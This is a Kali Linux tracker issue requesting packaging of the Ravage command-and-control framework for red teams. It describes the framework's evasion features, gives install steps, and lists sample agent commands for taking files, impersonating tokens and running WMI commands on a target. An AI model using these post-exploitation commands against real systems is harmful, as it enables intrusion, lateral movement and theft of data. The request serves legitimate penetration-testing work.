View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0009557Kali LinuxNew Tool Requestspublic2026-02-20 12:412026-02-20 12:41
Reportertriagge Assigned To 
PrioritynormalSeverityminorReproducibilityhave not tried
Status newResolutionopen 
Summary0009557: Ravage Framework, a powerful and maleable C2 framework designed for offensive security teams.
Description

[Name]
Ravage Framework

[Version]
1.2 — tagged as v1.2 at https://github.com/XPSec-Security/Ravage/releases/tag/v1.2

[Homepage]
https://github.com/XPSec-Security/Ravage

[Download]
https://github.com/XPSec-Security/Ravage/archive/refs/tags/v1.2.tar.gz

[Author]
XPSec Security

[Licence]
GNU General Public License v3.0 (GPL-3.0)

[Description]
Ravage is a Command & Control (C2) framework designed for cybersecurity professionals, red teams, and penetration testers. It provides a modular architecture with a web-based operator dashboard, dynamic listener management, AES-256 encrypted agent communications over SSL/TLS, multi-layer PowerShell obfuscation, traffic profile masquerading (mimicking CDN, YouTube, Teams traffic), and in-memory execution to minimise forensic footprint. Agents support file operations, process management, lateral movement (SMB/WMI exec, token impersonation), screenshots, and interactive shell execution.

[Dependencies]
Python 3.8+
OpenSSL (for SSL certificate generation)
Python packages: flask, pyyaml, cryptography

[Similar tools]
Cobalt Strike, Havoc, Sliver, Metasploit Framework, PowerShell Empire, Covenant, Villain, Merlin

[Activity]
Project started September 2025. Actively maintained — version 1.2 released February 2026.

[How to install]

Download release tarball

wget https://github.com/XPSec-Security/Ravage/archive/refs/tags/v1.2.tar.gz
tar -xzf v1.2.tar.gz && cd Ravage-1.2

Create virtual environment and install dependencies

python3 -m venv venv && source venv/bin/activate
pip install -r requirements.txt

Generate SSL certificates

mkdir certs
openssl req -x509 -newkey rsa:4096 -keyout certs/server.key -out certs/server.crt -days 365 -nodes

Configure and launch

cp profiles/profile.yaml.example profiles/profile.yaml
python main.py

[How to use]

Start the framework (admin panel available at https://localhost:2053)

python main.py

From the web dashboard, create a listener and generate an agent dropper.

Once an agent checks in, open an interactive session and run commands:

shell whoami
shell Get-WmiObject Win32_OperatingSystem
screenshot
plist
upload C:\Users\victim\loot.txt
list C:\Users\Administrator\Desktop
make_token DOMAIN\User:Password
wmi_exec TARGET "whoami"

[Packaged]
No

Attached Files
img_01.png (289,634 bytes)
img_02.png (164,291 bytes)   
img_02.png (164,291 bytes)   

Activities

Issue History

Date Modified Username Field Change
2026-02-20 12:41 triagge New Issue
2026-02-20 12:41 triagge File Added: img_01.png
2026-02-20 12:41 triagge File Added: img_02.png